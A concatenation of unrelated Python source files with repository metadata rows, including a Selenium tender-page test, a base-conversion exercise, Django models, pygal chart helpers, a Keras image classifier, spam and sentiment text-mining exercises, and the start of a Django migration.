sys.path.insert(0,folder_path+"\Object")
from launcheTender import LauncheTenderclass
from tenderDetails import Tenderdetails
from tenderDetails import SubmitTenderclass
from datadriven import DataDriver
from setupenviron import setupValue
from logouteTender import Userprofilemenu
##from RESTAPI import ReopentenderusingRESTAPIclass
from RESTAPIStaging import ReopentenderusingRESTAPIclass
from logdriver import logvalue
# Module-level logging and screenshot bookkeeping for this test script.
logs=logvalue.logger
logclose=logvalue()
# Timestamp string (currently unused for the filename — see commented line).
ftime = time.mktime(time.localtime())
ptime=time.strftime("%d-%m-%Y_%H%M%S", time.localtime(ftime))
#filename = 'TestCase-100358-{0}.png'.format(ptime)
tf = 'test_TenderverificationONSupplierStatus'
filename = 'Testcase-%s.png' %(tf)
# Full path where a failure screenshot is written by the test below.
path= setupValue().screenpath
fullpath = os.path.join(path,filename)
#Test case Number = 100358
class TenderverificationONSupplierStatus(unittest.TestCase):
    """UI regression test (case 100358): verify the supplier status shown
    on the tender page for a subcontractor login."""

    def test_TenderverificationONSupplierStatus(self):
        try:
            # Arrange: launch the browser and log in as a subcontractor.
            browserInstance = setupValue()
            browser = browserInstance.setupfunction()
            browser.implicitly_wait(5)
            time.sleep(1)
            LauncheTender1 = LauncheTenderclass()
            browser = LauncheTender1.openURL(browser)
            browser.implicitly_wait(5)
            time.sleep(1)
            tenderDetails = Tenderdetails()
            browser = LauncheTender1.subcontractorValidlogin(browser)
            #browser = LauncheTender1.list_Organisation(browser)
            #browser = LauncheTender1.verifyorganisationdetails(browser)
            browser = LauncheTender1.list_project(browser)
            time.sleep(1)
            browser = tenderDetails.Subcontratorproject(browser)
            time.sleep(2)
            # Act: look up the status element's XPath from the object map.
            tenderverifySupplierstatus1 = DataDriver()
            tenderverifySupplierstatus_path = tenderverifySupplierstatus1.readfromXML(folder_path+'\Object\TenderPage.xml','eTender','tenderverifySupplierstatus')
            time.sleep(1)
            tenderverifySupplierstatus = browser.find_element_by_xpath(tenderverifySupplierstatus_path) #Webelement for values
            time.sleep(1)
            # Assert: the supplier status label must read 'Review pending'.
            self.assertEqual(tenderverifySupplierstatus.text,'Review pending')
            logs.info("Test Case No : 100358 Passed Successfully")
        except Exception:
            # On any failure capture a screenshot and fail the test case.
            logs.error("Validation with Test Case No: 100358 failed")
            browser.save_screenshot(fullpath)
            traceback.print_exc(file=sys.stdout)
            self.fail("Test Case No: 100358 failed")
            # NOTE(review): unreachable — self.fail raises before this line.
            browser.implicitly_wait(5)
        finally:
            # Always close the browser, pass or fail.
            LauncheTender1.closebrowser(browser)
if __name__ == '__main__':
    # Allow running this test module directly via the unittest runner.
    unittest.main()
"Suresh.Kumar@causeway.com"
] | Suresh.Kumar@causeway.com |
9dcddbcc8d5d3f81e9b43c1b674bb99bf74081e6 | 495943f075f6a641d456d66deebb208847cb6c50 | /bases/bases.py | 4b971bac31d64037ece100affafdb194b8cec092 | [] | no_license | LukazDane/CS-1.3 | 377a6ef77c3db4a497f492ed73a3ba2487531b93 | 9cee1f71b9374a54a1fe336cd1f8db1a51275ef8 | refs/heads/master | 2022-07-04T00:26:48.498036 | 2020-05-11T02:37:00 | 2020-05-11T02:37:00 | 255,189,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,209 | py | import string
import math
# ##### https://en.wikipedia.org/wiki/List_of_Unicode_characters
# Hint: Use these string constants to encode/decode hexadecimal digits and more
# string.digits is '0123456789'
# string.hexdigits is '0123456789abcdefABCDEF'
# string.ascii_lowercase is 'abcdefghijklmnopqrstuvwxyz'
# string.ascii_uppercase is 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# string.ascii_letters is ascii_lowercase + ascii_uppercase
# string.printable is digits + ascii_letters + punctuation + whitespace
def decode(digits, base):
decoded = []
"""Decode given digits in given base to number in base 10.
digits: str -- string representation of number (in given base)
base: int -- base of given number
return: int -- integer representation of number (in base 10)"""
# Handle up to base 36 [0-9a-z]
assert 2 <= base <= 36, 'base is out of range: {}'.format(base)
# TODO: Decode digits from binary (base 2)
ndec = 0
digits = digits[::-1]
# if base == 2:
for i in range(len(digits)):
digit = int(digits[i], base=base)
ndec += digit * base ** i
return ndec
# elif base == 16:
# x = int(str(digits), 16)
# print(x)
# else:
# reverse the digits
# digits = digits[::-1]
# # print(digits)
# # variable to hold our answer
# num = 0
# # loop through each index
# for x in range(len(digits)):
# # variable to hold each index while we work it out
# uni = digits[x]
# if uni.isdigit():
# # if already a number (0-9) keep it
# uni = int(uni)
# # print(uni)
# else: # assumes alphabet
# # convert to unicode uppercase val, subtract calue of A and add 10 to get base 10 number
# uni = ord(uni.upper())-ord('A')+10
# # unicode a -> A = 65 | A(65) - A(65) + 10 = 10(a)
# # unicode b -> B = 66 | B(66) - A(65) + 10 = 11(b)
# # print(uni)
# num += uni*(base**x)
# decoded.append(num)
# print(decoded)
print(decode('1110 1100', 2))
print(decode('fff', 16))
print(decode("1a2b", 32))
def encode(number, base):
"""Encode given number in base 10 to digits in given base.
number: int -- integer representation of number (in base 10)
base: int -- base to convert to
return: str -- string representation of number (in given base)"""
# Handle up to base 36 [0-9a-z]
assert 2 <= base <= 36, 'base is out of range: {}'.format(base)
# Handle unsigned numbers only for now
assert number >= 0, 'number is negative: {}'.format(number)
# https://stackoverflow.com/questions/1181919/python-base-36-encoding
base_36 = string.digits + string.ascii_uppercase
result = []
while number > 0:
q = number / base
remainder = number % base
sep_q = str(q).split(".")
number = int(sep_q[0])
if 9 < remainder < base:
remainder = base_36[remainder].lower()
result.insert(0, str(remainder))
return "".join(result)
def convert(digits, base1, base2):
"""Convert given digits in base1 to digits in base2.
digits: str -- string representation of number (in base1)
base1: int -- base of given number
base2: int -- base to convert to
return: str -- string representation of number (in base2)"""
# Handle up to base 36 [0-9a-z]
assert 2 <= base1 <= 36, 'base1 is out of range: {}'.format(base1)
assert 2 <= base2 <= 36, 'base2 is out of range: {}'.format(base2)
decoded = decode(digits, base1)
return encode(decoded, base2)
def main():
"""Read command-line arguments and convert given digits between bases."""
import sys
args = sys.argv[1:] # Ignore script file name
if len(args) == 3:
digits = args[0]
base1 = int(args[1])
base2 = int(args[2])
# Convert given digits between bases
result = convert(digits, base1, base2)
print('{} in base {} is {} in base {}'.format(
digits, base1, result, base2))
else:
print('Usage: {} digits base1 base2'.format(sys.argv[0]))
print('Converts digits from base1 to base2')
if __name__ == '__main__':
main()
| [
"deandrevidal@aol.com"
] | deandrevidal@aol.com |
bc5eee51bb8fa035ca88cc586c8b806b2004d5e4 | 1cefaa5074569d972479fdc23b09d2cb70bc2332 | /apps/product/models.py | 7be7c81872b2e29b3673c58870fcbc1b78844f95 | [] | no_license | SazidAhmed/Django-Rest-Store-Server | 8cf5cfe8099686b6ef0952f72e29f69e9e995f9f | 99f98b4522913296867fdab38f4e53ce3596f200 | refs/heads/master | 2023-04-11T16:24:55.974446 | 2021-04-29T15:09:41 | 2021-04-29T15:09:41 | 357,680,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,059 | py | from io import BytesIO
from PIL import Image
from django.core.files import File
from django.db import models
class Category(models.Model):
    """Product category, addressed by slug in URLs."""
    name = models.CharField(max_length=255)
    slug = models.SlugField()

    class Meta:
        # Bug fix: the original declared `class Meta` twice; the second
        # definition silently replaced the first, discarding the ordering.
        # Both options now live in a single Meta.
        ordering = ('name',)
        verbose_name_plural = 'Categories'

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        return f'/{self.slug}/'
class Product(models.Model):
    """A store product belonging to a Category, with a lazily generated
    JPEG thumbnail cached on the model."""
    category = models.ForeignKey(Category, related_name='products', on_delete=models.CASCADE)
    name = models.CharField(max_length=255)
    slug = models.SlugField()
    description = models.TextField(blank=True, null=True)
    price = models.DecimalField(max_digits=6, decimal_places=2)
    image = models.ImageField(upload_to='uploads/', blank=True, null=True)
    thumbnail = models.ImageField(upload_to='uploads/', blank=True, null=True)
    date_added = models.DateTimeField(auto_now_add=True)

    class Meta:
        ordering = ('-date_added',)

    def __str__(self):
        return self.name

    # def __str__(self):
    #     return '%s %s' % (self.name, self.category.slug)

    def get_absolute_url(self):
        return f'/{self.category.slug}/{self.slug}/'

    def get_image(self):
        """Absolute URL of the full-size image, or '' when there is none."""
        # NOTE(review): the host is hard-coded for local development —
        # confirm before deploying (consider a setting or
        # request.build_absolute_uri instead).
        if self.image:
            return 'http://127.0.0.1:8000' + self.image.url
        return ''

    def get_thumbnail(self):
        """Absolute URL of the thumbnail, generating and saving it on
        first access when only the full image exists."""
        if self.thumbnail:
            return 'http://127.0.0.1:8000' + self.thumbnail.url
        else:
            if self.image:
                self.thumbnail = self.make_thumbnail(self.image)
                self.save()
                return 'http://127.0.0.1:8000' + self.thumbnail.url
            else:
                return ''

    def make_thumbnail(self, image, size=(345, 397)):
        """Downscale *image* in memory with Pillow and wrap it in a
        Django File suitable for an ImageField."""
        img = Image.open(image)
        # Bug fix: Image.convert returns a NEW image and the original code
        # discarded it, so e.g. RGBA PNGs would fail on the JPEG save below.
        img = img.convert('RGB')
        img.thumbnail(size)
        thumb_io = BytesIO()
        img.save(thumb_io, 'JPEG', quality=85)
        thumbnail = File(thumb_io, name=image.name)
        return thumbnail
"sazidahmed.official@gmail.com"
] | sazidahmed.official@gmail.com |
0e4529c3d3b3619b12b70827cb8b534191dd1ce1 | 9804004f7518c825579a2a8b0cde8dd5a3ba82b2 | /project_alva/project_alva/machine_learning/model/stats.py | 625fa81bfdae90ed4616558eb7d9c409bb73ff9d | [] | no_license | encoder-90/ds_projects | df69b18f659c886e37fec8bff083da11d2d6dc3d | 97d3a5c6c2441aea10a2487656fd2c972c4ccfa0 | refs/heads/main | 2023-08-13T00:49:33.424616 | 2021-09-27T06:07:46 | 2021-09-27T06:07:46 | 320,169,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,593 | py | import numpy as np
import uuid
import pygal
from machine_learning.data import helper
def transform_target_y(data):
    """
    Natural-log transform the target column ``adj_price`` in place and
    return the same frame. This scales the target and helps stabilize the
    outcome by making the values closer to normally distributed.

    NOTE: must be inverted later with exp (e = 2.71828...).
    """
    data['adj_price'] = np.log(data['adj_price'])
    return data
def reverse_log_transformation(result_df):
    """
    Undo the natural-log transform on the target and the model prediction
    columns by exponentiating them in place.

    https://numpy.org/doc/stable/reference/generated/numpy.exp.html
    """
    for column in ('adj_price', 'model_price_prediction'):
        result_df[column] = np.exp(result_df[column])
    return result_df
def get_data_subset_for_district(district):
    """
    Clean, restructure and slice the scraper data down to the rows whose
    ``district`` column matches the requested prediction district.
    """
    frame = helper.load_scraper_data()
    frame = helper.restructure_initial_data(frame)
    frame = helper.remove_missing_values(frame)
    frame = helper.map_construction_type_to_en(frame)
    return frame.loc[frame['district'] == district]
def get_number_samples_mapper():
    """
    Drop rows with a missing target (price) from the scraper data and
    return the remaining row count.
    """
    frame = helper.remove_missing_values(helper.load_scraper_data())
    return int(frame.shape[0])
def get_stats_for_apartment_type(data_filter, column_name):
    """Return the mean of *column_name* grouped by apartment type."""
    grouped = data_filter.groupby('apartment_type')
    return grouped[column_name].mean()
def get_svg_bar_plot_district_mean_price_per_apartment_type(df_district, prediction_price):
    """Render a bar chart comparing the prediction with district averages.

    The chart shows the user's predicted price next to the mean listing
    price per apartment type for the district and is written as a uniquely
    named SVG under ``web_app/static/web_app/media/``.

    Refactoring: the original duplicated the same filter/mean/round block
    seven times (once per apartment type); this collapses it into one
    helper and a loop with identical bar order.

    :param df_district: DataFrame with 'apartment_type' and 'price' columns
                        for one district. Mutated in place: apartment types
                        are renamed to their English labels.
    :param prediction_price: the model's predicted price.
    :return: file name (without directory) of the generated SVG.
    """
    mapping_type = {'1-STAEN': '1 ROOM', '2-STAEN': '2 ROOM', '3-STAEN': '3 ROOM', '4-STAEN': '4 ROOM',
                    'MNOGOSTAEN': '5+ ROOMS', 'MEZONET': 'PENTHOUSE', 'ATELIE': 'STUDIO'}
    df_district['apartment_type'].replace(mapping_type, inplace=True)

    def _mean_price(apartment_type):
        # Rounded mean price for one apartment type; 0 when the district
        # has no listings of that type (avoids NaN from an empty mean).
        subset = df_district.loc[df_district['apartment_type'] == apartment_type]
        if len(subset.index) == 0:
            return 0
        return int(round(subset["price"].mean(), 0))

    bar_chart = pygal.Bar(legend_at_bottom=True)
    bar_chart.title = 'Prediction value and district average price per apartment type (in €)'
    bar_chart.add('Your Prediction', [prediction_price])
    # Same series order as before the refactoring.
    for label, apartment_type in (('Studio', 'STUDIO'),
                                  ('One Room', '1 ROOM'),
                                  ('Two Room', '2 ROOM'),
                                  ('Three Room', '3 ROOM'),
                                  ('Four Room', '4 ROOM'),
                                  ('Five Plus Room', '5+ ROOMS'),
                                  ('Penthouse', 'PENTHOUSE')):
        bar_chart.add(label, [_mean_price(apartment_type)])
    file_name = f"prediction_bar{str(uuid.uuid4())}.svg"
    file_location = f"web_app/static/web_app/media/{file_name}"
    bar_chart.render_to_file(file_location)
    return file_name
def get_svg_pie_chart_by_number_properties_for_sale(df_district):
    """Render a donut chart of listing counts per apartment type.

    Writes a uniquely named SVG under ``web_app/static/web_app/media/``
    and returns its file name.

    Refactoring: the original duplicated the same filter/count block seven
    times (once per apartment type); this collapses it into one helper and
    a loop with identical slice order.

    :param df_district: DataFrame with 'apartment_type' and 'price' columns
                        for one district. Mutated in place: apartment types
                        are renamed to their English labels.
    :return: file name (without directory) of the generated SVG.
    """
    mapping_type = {'1-STAEN': '1 ROOM', '2-STAEN': '2 ROOM', '3-STAEN': '3 ROOM', '4-STAEN': '4 ROOM',
                    'MNOGOSTAEN': '5+ ROOMS', 'MEZONET': 'PENTHOUSE', 'ATELIE': 'STUDIO'}
    df_district['apartment_type'].replace(mapping_type, inplace=True)

    def _count(apartment_type):
        # Number of listings of one apartment type; 0 when there are none.
        subset = df_district.loc[df_district['apartment_type'] == apartment_type]
        if len(subset.index) == 0:
            return 0
        return subset["price"].count()

    pie_chart = pygal.Pie(inner_radius=.4, show_legend=False)
    pie_chart.title = 'Number properties for sale per apartment type for your prediction district'
    # Empty first slice keeps the slice colours aligned with the bar
    # chart's series colours (which start with 'Your Prediction').
    pie_chart.add('Prediction placeholder', [0])
    for label, apartment_type in (('Studio', 'STUDIO'),
                                  ('One Room', '1 ROOM'),
                                  ('Two Room', '2 ROOM'),
                                  ('Three Room', '3 ROOM'),
                                  ('Four Room', '4 ROOM'),
                                  ('Five Plus Room', '5+ ROOMS'),
                                  ('Penthouse', 'PENTHOUSE')):
        pie_chart.add(label, [_count(apartment_type)])
    file_name = f"prediction_pie{str(uuid.uuid4())}.svg"
    file_location = f"web_app/static/web_app/media/{file_name}"
    pie_chart.render_to_file(file_location)
    return file_name
| [
"a.jirov@student.fontys.nl"
] | a.jirov@student.fontys.nl |
a23916c417b2fe893c1d68ba20334ad5fc4aee29 | 15b4acc80b261325fdfc95f55852e8bf2bdbbb58 | /Keras_tf.py | 1ca06439b516cfcbd3c51dcb558640c67c4a0982 | [] | no_license | ChristianMDahl/ClassificationGradesheetsMiniPics | 8b551904fdac734a144ac3339ea7b410266ace6b | 1fd03c1b80ccb996723382ae657081e368cd8b34 | refs/heads/master | 2021-07-09T16:58:55.267843 | 2017-10-07T15:34:35 | 2017-10-07T15:34:35 | 106,108,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,303 | py | #---------------------------------------------------------
# Classification of mini_pics from sweedish grading sheets
#---------------------------------------------------------
import tensorflow as tf

# Re_estimate = 1: New model is trained
# Re_estimate = 0: Most recently trained model is loaded
##################
Re_estimate = 0 ##
##################

# Training images: 28x28 grayscale crops organised in one folder per class,
# pixel values rescaled to [0, 1].
data_train = tf.contrib.keras.preprocessing.image.DirectoryIterator(directory='Z:\\faellesmappe\\cmd\\MartinKarlsson\\tiny_pics\\goodsmall\\gradessmall\\train',
                                                                    image_data_generator=tf.contrib.keras.preprocessing.image.ImageDataGenerator(rescale=1./255),
                                                                    color_mode = 'grayscale',
                                                                    class_mode ='categorical',
                                                                    target_size=(28, 28))

# To make this work efficient we need a directory - similar to gradesmall -
# where we have the data for validation/test
data_test = tf.contrib.keras.preprocessing.image.DirectoryIterator(directory='Z:\\faellesmappe\\cmd\\MartinKarlsson\\tiny_pics\\goodsmall\\gradessmall\\test',
                                                                   image_data_generator=tf.contrib.keras.preprocessing.image.ImageDataGenerator(rescale=1./255),
                                                                   color_mode = 'grayscale',
                                                                   class_mode ='categorical',
                                                                   target_size=(28, 28))

if Re_estimate == 1:
    # Small LeNet-style CNN: two conv layers, max-pooling, dropout, dense head.
    model = tf.contrib.keras.models.Sequential()
    model.add(tf.contrib.keras.layers.Conv2D(32, kernel_size=(3, 3),
                                             activation='relu',
                                             input_shape=data_train.image_shape))
    model.add(tf.contrib.keras.layers.Conv2D(64, (3, 3), activation='relu'))
    model.add(tf.contrib.keras.layers.MaxPooling2D(pool_size=(2, 2)))
    model.add(tf.contrib.keras.layers.Dropout(0.25))
    model.add(tf.contrib.keras.layers.Flatten())
    model.add(tf.contrib.keras.layers.Dense(128, activation='relu'))
    model.add(tf.contrib.keras.layers.Dropout(0.5))
    model.add(tf.contrib.keras.layers.Dense(data_train.num_class, activation='softmax'))
    model.compile(loss=tf.contrib.keras.losses.categorical_crossentropy,
                  optimizer=tf.contrib.keras.optimizers.Adadelta(),
                  metrics=['accuracy'])
    # with tf.device('/gpu:1'): #Unfortunately this does not work...probably need to install tensorflow with the GPU open
    model.fit_generator(data_train,steps_per_epoch=200,epochs=100,validation_data=data_test,validation_steps= data_test.batch_size)
    # Report accuracy on both splits after training.
    score = model.evaluate_generator(data_train,steps=data_train.batch_size)
    print('Train loss:', score[0])
    print('Train accuracy:', score[1])
    score = model.evaluate_generator(data_test,steps=data_test.batch_size)
    print('Test loss:', score[0])
    print('Test accuracy:', score[1])
    # serialize model to YAML
    model_yaml = model.to_yaml()
    with open("model.yaml", "w") as yaml_file:
        yaml_file.write(model_yaml)
    # serialize weights to HDF5
    model.save_weights("model.h5")
    print("Saved model to disk")

if Re_estimate == 0:
    # load YAML and create model
    yaml_file = open('model.yaml', 'r')
    loaded_model_yaml = yaml_file.read()
    yaml_file.close()
    loaded_model = tf.contrib.keras.models.model_from_yaml(loaded_model_yaml)
    # load weights into new model
    loaded_model.load_weights("model.h5")
    print("Loaded model from disk")
    # evaluate loaded model on test data (compile is required before evaluate)
    loaded_model.compile(loss=tf.contrib.keras.losses.categorical_crossentropy,
                         optimizer=tf.contrib.keras.optimizers.Adadelta(),
                         metrics=['accuracy'])
    score = loaded_model.evaluate_generator(data_test,steps=data_test.batch_size)
    print("%s: %.2f%%" % (loaded_model.metrics_names[1], score[1]*100))
| [
"christianmdahl@gmail.com"
] | christianmdahl@gmail.com |
ccecdaff747cdec374326dda1a311cbd51a5223a | 9e4e40eafb302a560ce33f2c8418769fa14185d1 | /section3/sentiment_analysis.py | 0ebb649d7cd782b635beafc7bfaa8e394e758d86 | [] | no_license | anantsrivastava30/TextMining | 371bd46663e39702a0e38f8a6598e3e3030aca35 | f13f001295ee2567a6b2e4c277774fdac6426a44 | refs/heads/master | 2021-05-06T03:10:50.061765 | 2018-02-09T07:40:02 | 2018-02-09T07:40:02 | 114,817,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,214 | py | # coding: utf-8
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.svm import SVC
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
import re
# Load the Amazon unlocked-mobile reviews; keep a reproducible 1% sample.
df = pd.read_csv("Amazon_Unlocked_Mobile.csv")
df = df.sample(frac=0.01, random_state=10)
df.dropna(inplace=True)
# Drop neutral 3-star reviews and binarise the rating: >3 stars -> positive.
df = df[df['Rating'] != 3]
df['Positively Rated'] = np.where(df['Rating'] > 3, 1, 0)
print(df['Positively Rated'].mean())
X_train, X_test, y_train, y_test = train_test_split(
    df['Reviews'], df['Positively Rated'], random_state=0)
print('X_train first entry:\n\n', X_train.iloc[0])
print('\n\nX_train shape: ', X_train.shape)
# Fit the CountVectorizer to the training data
vect = CountVectorizer().fit(X_train)
print(vect.get_feature_names()[::2000])
print(len(vect.get_feature_names()))
X_train_vectorized = vect.transform(X_train)
print(X_train_vectorized.toarray().shape)
# Baseline bag-of-words logistic regression on the review data.
model = LogisticRegression()
model.fit(X_train_vectorized, y_train)
# Predict the transformed test documents
predictions = model.predict(vect.transform(X_test))
print('AUC: ', roc_auc_score(y_test, predictions))
# Second dataset: SMS spam; target is 1 for spam, 0 for ham.
spam_data = pd.read_csv('spam.csv')
spam_data['target'] = np.where(spam_data['target'] == 'spam', 1, 0)
spam_data.head(10)  # NOTE(review): return value unused -- presumably a notebook leftover
from sklearn.model_selection import train_test_split
# From here on X_train/X_test/y_train/y_test refer to the spam data.
X_train, X_test, y_train, y_test = train_test_split(
    spam_data['text'], spam_data['target'], random_state=0)
def answer_one():
    """Return the percentage of spam documents as a formatted string."""
    print(spam_data.shape)
    spam_ratio = spam_data['target'].values.mean()
    return "{:2.3f}%".format(spam_ratio * 100)
from sklearn.feature_extraction.text import CountVectorizer
def answer_two():
    """Return the longest token in the training vocabulary."""
    vocabulary = CountVectorizer().fit(X_train).get_feature_names()
    # Stable sort by length; the last element is the longest token
    # (last occurrence among equal-length ties, as in the original).
    return sorted(vocabulary, key=len)[-1]
from sklearn.naive_bayes import MultinomialNB
from sklearn.metrics import roc_auc_score
def answer_three():
    """Fit multinomial Naive Bayes on bag-of-words counts; return train AUC.

    NOTE(review): scores on the *training* split, as the original did.
    """
    vectorizer = CountVectorizer().fit(X_train)
    train_matrix = vectorizer.transform(X_train)
    print(train_matrix.shape)
    classifier = MultinomialNB()
    classifier.fit(train_matrix, y_train)
    train_predictions = classifier.predict(vectorizer.transform(X_train))
    return roc_auc_score(y_train, train_predictions)
def answer_four():
    """Return (20 smallest-idf features, 20 largest-idf features) as Series."""
    vect = TfidfVectorizer().fit(X_train)
    idf = pd.Series(vect.idf_, vect.get_feature_names())
    smallest = idf.sort_values(ascending=True)[:20]
    largest = idf.sort_values(ascending=False)[:20]
    return (smallest, largest)
def answer_five():
    """Fit multinomial Naive Bayes on tf-idf (min_df=3); return test AUC."""
    vectorizer = TfidfVectorizer(min_df=3).fit(X_train)
    train_matrix = vectorizer.transform(X_train)
    print(train_matrix.shape)
    classifier = MultinomialNB()
    classifier.fit(train_matrix, y_train)
    test_predictions = classifier.predict(vectorizer.transform(X_test))
    return roc_auc_score(y_test, test_predictions)
def answer_six():
    """Return (mean text length of spam messages, mean text length of ham)."""
    lengths = spam_data['text'].str.len()
    spam_mean = lengths[spam_data['target'] == 1].mean()
    ham_mean = lengths[spam_data['target'] == 0].mean()
    return (spam_mean, ham_mean)
def add_feature(X, feature_to_add):
    """Return sparse feature matrix with added feature.

    feature_to_add can also be a list of features; each becomes one new
    column appended on the right of X.
    """
    from scipy.sparse import csr_matrix, hstack
    new_columns = csr_matrix(feature_to_add).T
    return hstack([X, new_columns], 'csr')
def answer_seven():
    """Tf-idf (min_df=5) plus a document-length feature into an SVC; test AUC."""
    vectorizer = TfidfVectorizer(min_df=5).fit(X_train)
    train_matrix = vectorizer.transform(X_train)
    print(train_matrix.shape)
    doc_lengths = spam_data['text'].apply(lambda x: len(x))
    train_with_length = add_feature(train_matrix, doc_lengths[X_train.index])
    classifier = SVC(C=10000)
    classifier.fit(train_with_length, y_train)
    test_with_length = add_feature(vectorizer.transform(X_test),
                                   doc_lengths[X_test.index])
    predictions = classifier.predict(test_with_length)
    return roc_auc_score(y_test, predictions)
def answer_eight():
    """Return (avg digit count in spam texts, avg digit count in ham texts)."""
    digit_counts = spam_data['text'].apply(
        lambda text: sum(ch.isdigit() for ch in text))
    spam_avg = digit_counts[spam_data['target'] == 1].mean()
    ham_avg = digit_counts[spam_data['target'] == 0].mean()
    return (spam_avg, ham_avg)
def answer_nine():
    """Logistic regression on word n-gram tf-idf plus length/digit features.

    Returns the ROC-AUC on the test split.

    Bug fix: the original called ``add_feature`` twice, each time starting
    from the bare ``X_train_vectorized``, so the second call *overwrote*
    (rather than stacked on) the document-length feature; the test matrix
    had the same defect. Both extra features are now appended together.
    """
    vect = TfidfVectorizer(min_df=5, ngram_range=(1, 3)).fit(X_train)
    X_train_vectorized = vect.transform(X_train)
    print(X_train_vectorized.shape)
    doc_length = spam_data['text'].apply(lambda x: len(x))
    digit_count = spam_data['text'].apply(
        lambda s: sum(c.isdigit() for c in s))
    X_train_augmented = add_feature(
        X_train_vectorized,
        [doc_length[X_train.index], digit_count[X_train.index]])
    model = LogisticRegression(C=100).fit(X_train_augmented, y_train)
    X_test_augmented = add_feature(
        vect.transform(X_test),
        [doc_length[X_test.index], digit_count[X_test.index]])
    prediction = model.predict(X_test_augmented)
    return roc_auc_score(y_test, prediction)
def answer_ten():
    """Return (avg non-word-char count in spam texts, avg in ham texts)."""
    non_word_counts = spam_data['text'].apply(
        lambda text: sum(bool(re.match('\W', ch)) for ch in text))
    spam_avg = non_word_counts[spam_data['target'] == 1].mean()
    ham_avg = non_word_counts[spam_data['target'] == 0].mean()
    return (spam_avg, ham_avg)
def test_sample(v, model):
    """Print predictions of a fitted vectorizer/model pair on two sample texts."""
    samples = pd.Series(["A lot has happened on Facebook since , XIME offers a 2 year, full-time, residential PGDM programme through its centers last logged in. Here are some notifications you've missed from your friends",
                         "As you might be aware, XIME offers a 2 year, full-time, residential PGDM programme through its centers in Bangalore, Chennai and Kochi. Our PGDM programme is ranked 22nd by Business India (All India - 2017) and 25th by Business Standard (All India - 2017)."])
    doc_length = samples.apply(lambda s: len(s))
    digit_count = samples.apply(lambda s: sum([c.isdigit() for c in s]))
    non_word_count = samples.apply(lambda s: sum([bool(re.match('\W', x)) for x in s]))
    X = add_feature(v.transform(samples), [doc_length, digit_count, non_word_count])
    print("sample case predictions :{}".format(model.predict(X)))
def answer_eleven():
    """Char n-gram counts plus length/digit/non-word features into logistic regression.

    Returns (test AUC, 10 largest-coefficient features, 10 smallest-coefficient
    features) with the exact slicing of the original implementation.
    """
    vectorizer = CountVectorizer(
        min_df=5, ngram_range=(2, 5), analyzer='char_wb').fit(X_train)
    doc_length = spam_data['text'].apply(lambda s: len(s))
    digit_count = spam_data['text'].apply(
        lambda s: sum([c.isdigit() for c in s]))
    non_word_count = spam_data['text'].apply(
        lambda s: sum([bool(re.match('\W', x)) for x in s]))
    train_matrix = add_feature(
        vectorizer.transform(X_train),
        [doc_length[X_train.index], digit_count[X_train.index], non_word_count[X_train.index]])
    classifier = LogisticRegression(C=100).fit(train_matrix, y_train)
    test_matrix = add_feature(
        vectorizer.transform(X_test),
        [doc_length[X_test.index], digit_count[X_test.index], non_word_count[X_test.index]])
    predictions = classifier.predict(test_matrix)
    feature_names = np.array(vectorizer.get_feature_names())
    order = classifier.coef_[0].argsort()
    # Preserve the original slices exactly (including the off-by-one on the
    # upper slice, which drops the single largest coefficient).
    head_features = feature_names[order[:10]]
    tail_features = feature_names[order[len(order) - 11:len(order) - 1]]
    auc = roc_auc_score(y_test, predictions)
    return (auc, list(tail_features), list(head_features))
| [
"anantsrivastava30@gmail.com"
] | anantsrivastava30@gmail.com |
b6c14ecc4de8df6c97043617c7c8596c81f72f7a | 36f0cb1f6d660ab3f6de972c2c43b79276399581 | /prgrm1.py | 9c26052c51df30bd4ab8ae5b41b9d00e0eece9b9 | [] | no_license | alugurikeerthana/task1 | ea16a813f7015d55b17f154f049b129c72afe87d | fe3c4a112c6832c2ffc1ac4c1b7e5566d97bceec | refs/heads/master | 2020-03-19T13:13:39.361996 | 2018-06-08T05:05:39 | 2018-06-08T05:05:39 | 136,568,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | import numpy as np
# Draw six random integers uniformly from [10, 30) and print the array.
x = np.random.randint(low=10, high=30, size=6)
print(x)
| [
"noreply@github.com"
] | noreply@github.com |
92f23dfc35fd5f746d7c4a087a4c054ae511a765 | 637d06abc4c533cabfed9518857c702b6d0558a6 | /users/migrations/0001_initial.py | fbaefc5cbc447a45eaa28c11f2b2df3d9d6bbbaf | [] | no_license | nakusha/airbnb_django_backend | 5756b2e02abb3304ca67ee387041a83813890119 | 2a60c9279d5a661be264e5568451d544a29962ca | refs/heads/master | 2023-06-20T02:08:16.540289 | 2021-07-18T15:26:37 | 2021-07-18T15:26:37 | 367,626,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,519 | py | # Generated by Django 3.2.3 on 2021-06-16 07:25
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial migration: creates the custom ``User`` model.

    Auto-generated by Django 3.2.3; the model extends the standard auth user
    with avatar, gender, bio, birthday, language, currency and superhost
    fields for the Airbnb-clone backend.
    """

    initial = True

    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
                ('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
